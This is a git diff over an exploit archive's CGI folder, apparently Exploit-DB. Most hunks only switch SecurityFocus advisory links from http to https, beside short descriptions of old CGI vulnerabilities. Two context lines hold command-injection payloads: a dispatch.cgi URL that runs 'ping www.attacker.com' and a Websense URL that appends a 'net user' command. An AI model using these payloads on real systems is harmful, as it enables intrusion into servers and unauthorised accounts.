-#source: http://www.securityfocus.com/bid/2728/info +#source: https://www.securityfocus.com/bid/2728/info # #DCForum is a commercial cgi script from DCScripts which is designed to facilitate web-based threaded discussion forums. # diff --git a/exploits/cgi/remote/20878.txt b/exploits/cgi/remote/20878.txt index e9b013197..819c076e0 100644 --- a/exploits/cgi/remote/20878.txt +++ b/exploits/cgi/remote/20878.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2762/info +source: https://www.securityfocus.com/bid/2762/info MIMAnet Source Viewer is a freely available CGI script which allows users to view the source code of files located elsewhere on the server. diff --git a/exploits/cgi/remote/20887.txt b/exploits/cgi/remote/20887.txt index 987e10272..cc7bf1516 100644 --- a/exploits/cgi/remote/20887.txt +++ b/exploits/cgi/remote/20887.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2793/info +source: https://www.securityfocus.com/bid/2793/info Webdirectory Pro is a web application used to create a searchable directory of links developed by Cosmicperl. diff --git a/exploits/cgi/remote/20895.txt b/exploits/cgi/remote/20895.txt index 065df65a3..a626b0218 100644 --- a/exploits/cgi/remote/20895.txt +++ b/exploits/cgi/remote/20895.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2812/info +source: https://www.securityfocus.com/bid/2812/info WebTrends Live is a web-based reporting service which provides interactive tracking of usage statistics and E-commerce revenue. diff --git a/exploits/cgi/remote/20914.pl b/exploits/cgi/remote/20914.pl index b9d415b4e..003d76153 100755 --- a/exploits/cgi/remote/20914.pl +++ b/exploits/cgi/remote/20914.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2860/info +source: https://www.securityfocus.com/bid/2860/info cgiCentral's Webstore is an shopping cart application which processes and manages online purchases. diff --git a/exploits/cgi/remote/20916.pl b/exploits/cgi/remote/20916.pl index 79f426dcf..bc1e561c3 100755 --- a/exploits/cgi/remote/20916.pl +++ b/exploits/cgi/remote/20916.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2861/info +source: https://www.securityfocus.com/bid/2861/info cgiCentral's Webstore is an shopping cart application which processes and manages online purchases. diff --git a/exploits/cgi/remote/20935.pl b/exploits/cgi/remote/20935.pl index 68c3640a3..7940523b4 100755 --- a/exploits/cgi/remote/20935.pl +++ b/exploits/cgi/remote/20935.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2884/info +source: https://www.securityfocus.com/bid/2884/info uDirectory is an online directory and listing management system. diff --git a/exploits/cgi/remote/20938.txt b/exploits/cgi/remote/20938.txt index ccc8a2b2a..5810b3df0 100644 --- a/exploits/cgi/remote/20938.txt +++ b/exploits/cgi/remote/20938.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2889/info +source: https://www.securityfocus.com/bid/2889/info DCShop is a GCI-based ecommerce system from DCScripts. diff --git a/exploits/cgi/remote/20939.txt b/exploits/cgi/remote/20939.txt index 6868a4256..2f55709ab 100644 --- a/exploits/cgi/remote/20939.txt +++ b/exploits/cgi/remote/20939.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2889/info +source: https://www.securityfocus.com/bid/2889/info DCShop is a GCI-based ecommerce system from DCScripts. diff --git a/exploits/cgi/remote/20940.txt b/exploits/cgi/remote/20940.txt index b456c409e..74f63d5ca 100644 --- a/exploits/cgi/remote/20940.txt +++ b/exploits/cgi/remote/20940.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2890/info +source: https://www.securityfocus.com/bid/2890/info Tarantella Enterprise 3 is a tool for centralized management of data and applications. It is operated via a web interface. It will run on a number of Unix and Linux distributions. diff --git a/exploits/cgi/remote/20982.pl b/exploits/cgi/remote/20982.pl index a3d9d5b52..d21f99a61 100755 --- a/exploits/cgi/remote/20982.pl +++ b/exploits/cgi/remote/20982.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2942/info +source: https://www.securityfocus.com/bid/2942/info Active Classifieds is a CGI package that provides an online classified advertisement listing and management system. diff --git a/exploits/cgi/remote/21008.txt b/exploits/cgi/remote/21008.txt index a5b9a4352..5c3efab5f 100644 --- a/exploits/cgi/remote/21008.txt +++ b/exploits/cgi/remote/21008.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3028/info +source: https://www.securityfocus.com/bid/3028/info Interactive Story is a web-based application written in Perl and is distributed as freeware. diff --git a/exploits/cgi/remote/21023.txt b/exploits/cgi/remote/21023.txt index a7d50fe02..ed6af8b0f 100644 --- a/exploits/cgi/remote/21023.txt +++ b/exploits/cgi/remote/21023.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3081/info +source: https://www.securityfocus.com/bid/3081/info CGIWrap is a free, open-source program for running CGI securely. diff --git a/exploits/cgi/remote/21068.txt b/exploits/cgi/remote/21068.txt index 6fe2b536d..5b065f735 100644 --- a/exploits/cgi/remote/21068.txt +++ b/exploits/cgi/remote/21068.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3175/info +source: https://www.securityfocus.com/bid/3175/info SIX-webboard 2.01 does not filter ".." and "/" from user input, allowing users to enter arbitrary values in order to view or retrieve files not normally accessible to them from the remote host. diff --git a/exploits/cgi/remote/21102.txt b/exploits/cgi/remote/21102.txt index 9c663ff71..337bd9c6c 100644 --- a/exploits/cgi/remote/21102.txt +++ b/exploits/cgi/remote/21102.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3304/info +source: https://www.securityfocus.com/bid/3304/info Power Up HTML is a set of HTML-like commands that can be placed into web pages. It provides a central routing point to simplify programming and customization of CGI scripts. diff --git a/exploits/cgi/remote/21104.pl b/exploits/cgi/remote/21104.pl index 698f732a3..68e9a59c2 100755 --- a/exploits/cgi/remote/21104.pl +++ b/exploits/cgi/remote/21104.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3308/info +source: https://www.securityfocus.com/bid/3308/info Hassan Consulting's Shopping Cart is commercial web store software. diff --git a/exploits/cgi/remote/21125.pl b/exploits/cgi/remote/21125.pl index 5ce776957..a763f7d5e 100755 --- a/exploits/cgi/remote/21125.pl +++ b/exploits/cgi/remote/21125.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3453/info +source: https://www.securityfocus.com/bid/3453/info Mountain Network Systems WebCart is a cgi based online shopping suite. An error in the webcart.cgi script allows a remote user to pass an arbitrary shell command which will be executed by the script. diff --git a/exploits/cgi/remote/21129.java b/exploits/cgi/remote/21129.java index 4310e6138..68d74c5fb 100644 --- a/exploits/cgi/remote/21129.java +++ b/exploits/cgi/remote/21129.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3476/info +source: https://www.securityfocus.com/bid/3476/info iBill is an Internet billing company that provides secure payment processing for e-commerce. diff --git a/exploits/cgi/remote/21183.txt b/exploits/cgi/remote/21183.txt index c808fd1ab..202876d4e 100644 --- a/exploits/cgi/remote/21183.txt +++ b/exploits/cgi/remote/21183.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3698/info +source: https://www.securityfocus.com/bid/3698/info Webmin is a web-based interface for system administration for Unix. Using any browser that supports tables and forms, you can setup user accounts, Apache, DNS, file sharing and so on. Webmin will run on most Unix variants, providing it has been properly configured. diff --git a/exploits/cgi/remote/21194.txt b/exploits/cgi/remote/21194.txt index e0157f663..e84f8a42c 100644 --- a/exploits/cgi/remote/21194.txt +++ b/exploits/cgi/remote/21194.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3759/info +source: https://www.securityfocus.com/bid/3759/info zml.cgi is a perl script which can be used to support server side include directives under Apache. It recognizes a simple set of commands, and allows access to cgi parameters and environment variables. It can run on Linux and Unix systems or any other platform with Apache and Perl support. diff --git a/exploits/cgi/remote/21249.txt b/exploits/cgi/remote/21249.txt index 5ac10a507..71f67bb7c 100644 --- a/exploits/cgi/remote/21249.txt +++ b/exploits/cgi/remote/21249.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3976/info +source: https://www.securityfocus.com/bid/3976/info Agora.cgi is a freely available, open source shopping cart system. diff --git a/exploits/cgi/remote/21263.txt b/exploits/cgi/remote/21263.txt index 11f03129d..82954b9e9 100644 --- a/exploits/cgi/remote/21263.txt +++ b/exploits/cgi/remote/21263.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4023/info +source: https://www.securityfocus.com/bid/4023/info FAQ-O-Matic is a freely available, open-source FAQ (Frequently Asked Questions) manager. It is intended to run on Linux and Unix variants. diff --git a/exploits/cgi/remote/21287.pl b/exploits/cgi/remote/21287.pl index ef2ef7469..84a5dc9c6 100755 --- a/exploits/cgi/remote/21287.pl +++ b/exploits/cgi/remote/21287.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4068/info +source: https://www.securityfocus.com/bid/4068/info Ezboard 2000 is a web based bulletin board system. It is available for Linux systems. diff --git a/exploits/cgi/remote/21340.pl b/exploits/cgi/remote/21340.pl index ad540b273..bf31f9297 100755 --- a/exploits/cgi/remote/21340.pl +++ b/exploits/cgi/remote/21340.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4269/info +source: https://www.securityfocus.com/bid/4269/info The Sunsolve CD is part of the Solaris Media pack. It is included as a documentation resource, and is available for the Solaris Operating Environment. diff --git a/exploits/cgi/remote/21354.txt b/exploits/cgi/remote/21354.txt index f20054d26..db6c612fd 100644 --- a/exploits/cgi/remote/21354.txt +++ b/exploits/cgi/remote/21354.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4368/info +source: https://www.securityfocus.com/bid/4368/info csSearch is a website search script, written in Perl. It will run on most Unix and Linux variants, as well as Microsoft operating systems. diff --git a/exploits/cgi/remote/21390.txt b/exploits/cgi/remote/21390.txt index 7dc9eb538..dcb62660f 100644 --- a/exploits/cgi/remote/21390.txt +++ b/exploits/cgi/remote/21390.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4533/info +source: https://www.securityfocus.com/bid/4533/info An issue has been discovered in Sambar Server, which could allow a user to reveal the source code of script files. diff --git a/exploits/cgi/remote/21415.txt b/exploits/cgi/remote/21415.txt index 394d28bec..a7aa905f7 100644 --- a/exploits/cgi/remote/21415.txt +++ b/exploits/cgi/remote/21415.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4579/info +source: https://www.securityfocus.com/bid/4579/info CGIScript.NET csMailto is a Perl script designed to support multiple mailto: forms. A vulnerability has been reported in some versions of this script. diff --git a/exploits/cgi/remote/21641.txt b/exploits/cgi/remote/21641.txt index ba6cdfe1b..1e9404fcb 100644 --- a/exploits/cgi/remote/21641.txt +++ b/exploits/cgi/remote/21641.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5298/info +source: https://www.securityfocus.com/bid/5298/info GNU Mailman is prone to a cross-site scripting vulnerability. Arbitrary HTML and script code are not sanitized from the URI parameters of mailing list subscribe scripts. diff --git a/exploits/cgi/remote/21642.txt b/exploits/cgi/remote/21642.txt index 689e2704e..23e818207 100644 --- a/exploits/cgi/remote/21642.txt +++ b/exploits/cgi/remote/21642.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5299/info +source: https://www.securityfocus.com/bid/5299/info GNU Mailman is prone to a cross-site scripting vulnerability. An attacker may construct a malicious link to the administrative login page, which contains arbitrary HTML and script code. diff --git a/exploits/cgi/remote/22000.txt b/exploits/cgi/remote/22000.txt index 354fd7a4c..7bfa22a3a 100644 --- a/exploits/cgi/remote/22000.txt +++ b/exploits/cgi/remote/22000.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6144/info +source: https://www.securityfocus.com/bid/6144/info The Zeus Web Server contains a web based administration interface that is vulnerable to cross site scripting attacks. diff --git a/exploits/cgi/remote/22054.c b/exploits/cgi/remote/22054.c index b4eb42e48..9e9d18e6c 100644 --- a/exploits/cgi/remote/22054.c +++ b/exploits/cgi/remote/22054.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6281/info +// source: https://www.securityfocus.com/bid/6281/info A vulnerability has been discovered in Boozt. By passing a malicious parameter of excessive length to the index.cgi script, it is possible to overrun a buffer. This could be exploited by a remote attacker to corrupt sensitive memory, which may result in the execution of arbitrary code. diff --git a/exploits/cgi/remote/22311.txt b/exploits/cgi/remote/22311.txt index d0cfcf156..85051bf2d 100644 --- a/exploits/cgi/remote/22311.txt +++ b/exploits/cgi/remote/22311.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6987/info +source: https://www.securityfocus.com/bid/6987/info It has been reported that the Axis Video Servers do not properly handle input to the 'command.cgi' script. Because of this, an attacker may be able to create arbitrary files that would result in a denial of service, or potentially command execution. diff --git a/exploits/cgi/remote/22312.txt b/exploits/cgi/remote/22312.txt index 9e51bd757..684aeed10 100644 --- a/exploits/cgi/remote/22312.txt +++ b/exploits/cgi/remote/22312.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6990/info +source: https://www.securityfocus.com/bid/6990/info A file retrieval vulnerability has been reported for QuickTime/Darwin Streaming Server. The vulnerability exists due to insufficient sanitization of some parameters given to the parse_xml.cgi script. Information obtained in this manner may be used by an attacker to launch more organinzed attacks against a vulnerable system. diff --git a/exploits/cgi/remote/22355.txt b/exploits/cgi/remote/22355.txt index fabe0a4a0..02c33e8c5 100644 --- a/exploits/cgi/remote/22355.txt +++ b/exploits/cgi/remote/22355.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7105/info +source: https://www.securityfocus.com/bid/7105/info Thunderstone TEXIS is prone to an information-disclosure vulnerability. diff --git a/exploits/cgi/remote/22541.txt b/exploits/cgi/remote/22541.txt index 36fa6f83d..0964171b9 100644 --- a/exploits/cgi/remote/22541.txt +++ b/exploits/cgi/remote/22541.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7438/info +source: https://www.securityfocus.com/bid/7438/info Alt-N WebAdmin allows a remote user to access files that they should not be able to access. The remote user can submit an HTTP request that will return the contents of any webserver-readable file on the system. diff --git a/exploits/cgi/remote/22542.txt b/exploits/cgi/remote/22542.txt index b790ff5ff..eaf7c01d1 100644 --- a/exploits/cgi/remote/22542.txt +++ b/exploits/cgi/remote/22542.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7439/info +source: https://www.securityfocus.com/bid/7439/info Reportedly, remote users can discover the installation directory of certain software on the underlying system by submitting an HTTP request to the WebAdmin server. This could allow an attacker to obtain sensitive information. diff --git a/exploits/cgi/remote/22753.pl b/exploits/cgi/remote/22753.pl index 53b358de3..15fec5f08 100755 --- a/exploits/cgi/remote/22753.pl +++ b/exploits/cgi/remote/22753.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7865/info +source: https://www.securityfocus.com/bid/7865/info mnoGoSearch 'search.cgi' has been reported prone to a buffer overflow vulnerability. diff --git a/exploits/cgi/remote/22754.pl b/exploits/cgi/remote/22754.pl index a160366ad..4bc14c293 100755 --- a/exploits/cgi/remote/22754.pl +++ b/exploits/cgi/remote/22754.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7865/info +source: https://www.securityfocus.com/bid/7865/info mnoGoSearch 'search.cgi' has been reported prone to a buffer overflow vulnerability. diff --git a/exploits/cgi/remote/23187.txt b/exploits/cgi/remote/23187.txt index d94073476..14383b45d 100644 --- a/exploits/cgi/remote/23187.txt +++ b/exploits/cgi/remote/23187.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8705/info +source: https://www.securityfocus.com/bid/8705/info sbox has been reported prone to a path disclosure vulnerability. diff --git a/exploits/cgi/remote/23304.txt b/exploits/cgi/remote/23304.txt index 473c3a0d0..da2498417 100644 --- a/exploits/cgi/remote/23304.txt +++ b/exploits/cgi/remote/23304.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8904/info +source: https://www.securityfocus.com/bid/8904/info It has been reported that Symantec Norton Internet Security is prone to a cross-site scripting vulnerability. The issue is reported to exist when the software blocks a restricted website and an error message containing the requested URL is returned to the user. This URL is not sanitized for malicious input therefore allowing a remote attacker to execute HTML or script code in the browser of a user running the vulnerable software. The script code would run in the context of the blocked site. diff --git a/exploits/cgi/remote/23312.txt b/exploits/cgi/remote/23312.txt index 60a2ee8da..e038d6ae7 100644 --- a/exploits/cgi/remote/23312.txt +++ b/exploits/cgi/remote/23312.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8931/info +source: https://www.securityfocus.com/bid/8931/info A vulnerability has reported to exist in BEA Tuxedo and WebLogic Enterprise due to Tuxedo administration console. The script is reported to accept various initialization arguments such as INIFILE that are not properly sanitized for user-supplied input. This issue may allow an attacker to carry out attacks such as denial of service, file disclosure, and cross-site scripting. diff --git a/exploits/cgi/remote/23582.txt b/exploits/cgi/remote/23582.txt index 27af670b8..346ca70cd 100644 --- a/exploits/cgi/remote/23582.txt +++ b/exploits/cgi/remote/23582.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9474/info +source: https://www.securityfocus.com/bid/9474/info thttpd is prone to a cross-site scripting vulnerability in the CGI test script. This could permit a remote attacker to create a malicious link to the web server that includes hostile HTML and script code. If this link were followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the web server and may allow for theft of cookie-based authentication credentials or other attacks. diff --git a/exploits/cgi/remote/23804.txt b/exploits/cgi/remote/23804.txt index 81dce720f..cdfd17862 100644 --- a/exploits/cgi/remote/23804.txt +++ b/exploits/cgi/remote/23804.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9848/info +source: https://www.securityfocus.com/bid/9848/info A potential remote command execution vulnerability has been discovered in the cPanel Application. This issue occurs due to insufficient sanitization of externally supplied data to the script that handles resetting user passwords. diff --git a/exploits/cgi/remote/23987.txt b/exploits/cgi/remote/23987.txt index 078c7873f..2d067d998 100644 --- a/exploits/cgi/remote/23987.txt +++ b/exploits/cgi/remote/23987.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10103/info +source: https://www.securityfocus.com/bid/10103/info SurgeLDAP is prone to a directory traversal vulnerability in one of the scripts included with the built-in web administrative server, potentially resulting in disclosure of files. diff --git a/exploits/cgi/remote/24326.txt b/exploits/cgi/remote/24326.txt index b9f986ebe..2a06ec3c9 100644 --- a/exploits/cgi/remote/24326.txt +++ b/exploits/cgi/remote/24326.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10812/info +source: https://www.securityfocus.com/bid/10812/info RiSearch and RiSearch Pro are reported prone to an open proxy vulnerability. It is reported that the issue presents itself due to a lack of sufficient sanitization performed on user supplied URI parameters. diff --git a/exploits/cgi/remote/24327.txt b/exploits/cgi/remote/24327.txt index eb9bcd64b..b41b476bf 100644 --- a/exploits/cgi/remote/24327.txt +++ b/exploits/cgi/remote/24327.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10812/info +source: https://www.securityfocus.com/bid/10812/info RiSearch and RiSearch Pro are reported prone to an open proxy vulnerability. It is reported that the issue presents itself due to a lack of sufficient sanitization performed on user supplied URI parameters. diff --git a/exploits/cgi/remote/24336.txt b/exploits/cgi/remote/24336.txt index 01a8d6ec4..fe635b8c0 100644 --- a/exploits/cgi/remote/24336.txt +++ b/exploits/cgi/remote/24336.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10831/info +source: https://www.securityfocus.com/bid/10831/info Reportedly MyServer is affected by multiple remote vulnerabilities in the 'math_sum.mscgi' example script. These issues are due to a boundary condition error and a failure to properly sanitize user-supplied URI input. diff --git a/exploits/cgi/remote/24337.txt b/exploits/cgi/remote/24337.txt index b419462a1..0ec569a29 100644 --- a/exploits/cgi/remote/24337.txt +++ b/exploits/cgi/remote/24337.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10831/info +source: https://www.securityfocus.com/bid/10831/info Reportedly MyServer is affected by multiple remote vulnerabilities in the 'math_sum.mscgi' example script. These issues are due to a boundary condition error and a failure to properly sanitize user-supplied URI input. diff --git a/exploits/cgi/remote/24342.txt b/exploits/cgi/remote/24342.txt index 8d0308b33..6f1874227 100644 --- a/exploits/cgi/remote/24342.txt +++ b/exploits/cgi/remote/24342.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10837/info +source: https://www.securityfocus.com/bid/10837/info Reportedly Webcam Corp Webcam Watchdog is affected by a remote cross-site scripting vulnerability in the sresult.exe binary. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated web content. diff --git a/exploits/cgi/remote/25648.txt b/exploits/cgi/remote/25648.txt index 75afef956..e874f504b 100644 --- a/exploits/cgi/remote/25648.txt +++ b/exploits/cgi/remote/25648.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13596/info +source: https://www.securityfocus.com/bid/13596/info NexusWay is reportedly affected by multiple remote vulnerabilities. These issues can allow an unauthorized attacker to execute arbitrary commands and gain administrative access to an affected device. diff --git a/exploits/cgi/remote/26768.txt b/exploits/cgi/remote/26768.txt index d92bc1ef0..4151ab3c4 100644 --- a/exploits/cgi/remote/26768.txt +++ b/exploits/cgi/remote/26768.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15779/info +source: https://www.securityfocus.com/bid/15779/info Perl-Cal is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/remote/32962.txt b/exploits/cgi/remote/32962.txt index 034a36ee1..6ad412c7a 100644 --- a/exploits/cgi/remote/32962.txt +++ b/exploits/cgi/remote/32962.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34760/info +source: https://www.securityfocus.com/bid/34760/info LevelOne AMG-2000 is prone to a security-bypass vulnerability. diff --git a/exploits/cgi/remote/33051.txt b/exploits/cgi/remote/33051.txt index 0695d61ea..9d5494393 100644 --- a/exploits/cgi/remote/33051.txt +++ b/exploits/cgi/remote/33051.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35464/info +source: https://www.securityfocus.com/bid/35464/info Nagios is prone to a remote command-injection vulnerability because it fails to adequately sanitize user-supplied input data. diff --git a/exploits/cgi/remote/36045.txt b/exploits/cgi/remote/36045.txt index ed76ca72d..74ece17c8 100644 --- a/exploits/cgi/remote/36045.txt +++ b/exploits/cgi/remote/36045.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49160/info +source: https://www.securityfocus.com/bid/49160/info SurgeFTP is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/cgi/remote/39074.txt b/exploits/cgi/remote/39074.txt index 6643e8139..4beff1566 100644 --- a/exploits/cgi/remote/39074.txt +++ b/exploits/cgi/remote/39074.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/65306/info +source: https://www.securityfocus.com/bid/65306/info WiMAX SWC-9100 Mobile Router is prone to a security-bypass vulnerability and a command-injection vulnerability. diff --git a/exploits/cgi/webapps/15987.py b/exploits/cgi/webapps/15987.py index 5dc61d672..626ead0ea 100755 --- a/exploits/cgi/webapps/15987.py +++ b/exploits/cgi/webapps/15987.py @@ -49,7 +49,7 @@ http://www.website.com/dispatch.cgi/0;set fl [open "|ping www.attacker.com" ] References: ----------- -BID http://www.securityfocus.com/bid/26963 +BID https://www.securityfocus.com/bid/26963 CVE http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6515 Post http://securityvulns.com/Sdocument702.html PoC http://www.securestate.com/Documents/sitescape_sploit.txt diff --git a/exploits/cgi/webapps/18824.txt b/exploits/cgi/webapps/18824.txt index de6e55bd7..4f9cf6154 100644 --- a/exploits/cgi/webapps/18824.txt +++ b/exploits/cgi/webapps/18824.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51086/info +source: https://www.securityfocus.com/bid/51086/info Websense Triton is prone to a remote command-execution vulnerability. @@ -10,7 +10,7 @@ https://www.example.com/explorer_wse/ws_irpt.exe?&SendFile=echo.pdf%26net user a ################################################### -source: http://www.securityfocus.com/bid/51088/info +source: https://www.securityfocus.com/bid/51088/info Websense Triton 'favorites.exe' HTML Injection Vulnerability @@ -37,7 +37,7 @@ https://www.example.com/explorer_wse/favorites.exe?Program=ws_irpt.exe¶ms=st ################################################### -source: http://www.securityfocus.com/bid/51085/info +source: https://www.securityfocus.com/bid/51085/info Websense Triton Report Management Interface Cross Site Scripting Vulnerability diff --git a/exploits/cgi/webapps/21184.txt b/exploits/cgi/webapps/21184.txt index 08632b172..07473c392 100644 --- a/exploits/cgi/webapps/21184.txt +++ b/exploits/cgi/webapps/21184.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3702/info +source: https://www.securityfocus.com/bid/3702/info Agora.cgi is a freely available, open source shopping cart system. diff --git a/exploits/cgi/webapps/21187.txt b/exploits/cgi/webapps/21187.txt index 7aa97b1d6..a3bb0b6e8 100644 --- a/exploits/cgi/webapps/21187.txt +++ b/exploits/cgi/webapps/21187.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3714/info +source: https://www.securityfocus.com/bid/3714/info Aktivate is a shopping cart system which is geared towards Unix and Linux users, uses MySQL as a backend, and is written in Perl. diff --git a/exploits/cgi/webapps/21208.txt b/exploits/cgi/webapps/21208.txt index efcec0a6b..e51d4f441 100644 --- a/exploits/cgi/webapps/21208.txt +++ b/exploits/cgi/webapps/21208.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3828/info +source: https://www.securityfocus.com/bid/3828/info YaBB (Yet Another Bulletin Board) is freely available web forums/community software that is written in Perl. YaBB will run on most Unix/Linux variants, MacOS, and Microsoft Windows 9x/ME/NT/2000/XP platforms. diff --git a/exploits/cgi/webapps/21209.txt b/exploits/cgi/webapps/21209.txt index 6a7bdc4c0..311510647 100644 --- a/exploits/cgi/webapps/21209.txt +++ b/exploits/cgi/webapps/21209.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3829/info +source: https://www.securityfocus.com/bid/3829/info UBB (Ultimate Bulletin Board) is commercial web forums/community software that is written in Perl. It runs on various Unix/Linux variants, as well as Microsoft Windows NT/2000. diff --git a/exploits/cgi/webapps/21257.txt b/exploits/cgi/webapps/21257.txt index 044194311..debf2dce7 100644 --- a/exploits/cgi/webapps/21257.txt +++ b/exploits/cgi/webapps/21257.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3985/info +source: https://www.securityfocus.com/bid/3985/info Search.CGI is a component of the HTMLsearch Search Engine software distributed by AHG. The software is available for the Unix, Linux, and Microsoft platforms. diff --git a/exploits/cgi/webapps/21352.txt b/exploits/cgi/webapps/21352.txt index c143facf0..64a519b53 100644 --- a/exploits/cgi/webapps/21352.txt +++ b/exploits/cgi/webapps/21352.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4356/info +source: https://www.securityfocus.com/bid/4356/info DCShop Beta is a freely available shopping cart system, written in Perl. It will run on most Unix and Linux variants, as well as Microsoft Windows operating systems. diff --git a/exploits/cgi/webapps/21374.txt b/exploits/cgi/webapps/21374.txt index 18e8dc613..aefa1f564 100644 --- a/exploits/cgi/webapps/21374.txt +++ b/exploits/cgi/webapps/21374.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4496/info +source: https://www.securityfocus.com/bid/4496/info Informix is an enterprise database distributed and maintained by IBM. The Web Datablade Module for Informix SQL, dynamically generates HTML content based on Database data. Web Datablade is available for Apache, IIS, and Netscape web servers, and a generic CGI version is provided for alternative servers. It will execute under Windows NT, Linux and many Unix-like systems. diff --git a/exploits/cgi/webapps/21405.txt b/exploits/cgi/webapps/21405.txt index e45c5ae7e..983b8800e 100644 --- a/exploits/cgi/webapps/21405.txt +++ b/exploits/cgi/webapps/21405.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4565/info +source: https://www.securityfocus.com/bid/4565/info Faq-O-Matic 2.711 and 2.712 is a web-based Frequently Asked Question (FAQ) management system. It is vulnerable to a cross site scripting issue arising from a failure to filter HTML or script from a malformed query, returning the submitted script as an error message which is then processed by the browser. This is done by submitting the script as an argument to the Faq-O-Matic component "fom.cgi" - specifically, to the "file" parameter. This script is then treated by the user's browser as though it originated from the Faq-O-Matic web site. diff --git a/exploits/cgi/webapps/21406.txt b/exploits/cgi/webapps/21406.txt index c52e2dabd..fe1e8f3a4 100644 --- a/exploits/cgi/webapps/21406.txt +++ b/exploits/cgi/webapps/21406.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4566/info +source: https://www.securityfocus.com/bid/4566/info Philip Chinery's Guestbook is freely available guestbook software. It will run on most Unix and Linux variants, as well as Microsoft Windows operating systems. diff --git a/exploits/cgi/webapps/21411.txt b/exploits/cgi/webapps/21411.txt index ba26278b1..a17bdd587 100644 --- a/exploits/cgi/webapps/21411.txt +++ b/exploits/cgi/webapps/21411.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4573/info +source: https://www.securityfocus.com/bid/4573/info vqServer is a HTTP server implemented in Java. vqServer is available on any architecture supporting Java, including Linux and Microsoft Windows. diff --git a/exploits/cgi/webapps/21433.txt b/exploits/cgi/webapps/21433.txt index 3cc31296e..097de029d 100644 --- a/exploits/cgi/webapps/21433.txt +++ b/exploits/cgi/webapps/21433.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4651/info +source: https://www.securityfocus.com/bid/4651/info MyGuestbook is freely available guestbook software. It will run on most Unix and Linux variants, as well as Microsoft Windows operating systems. diff --git a/exploits/cgi/webapps/21435.txt 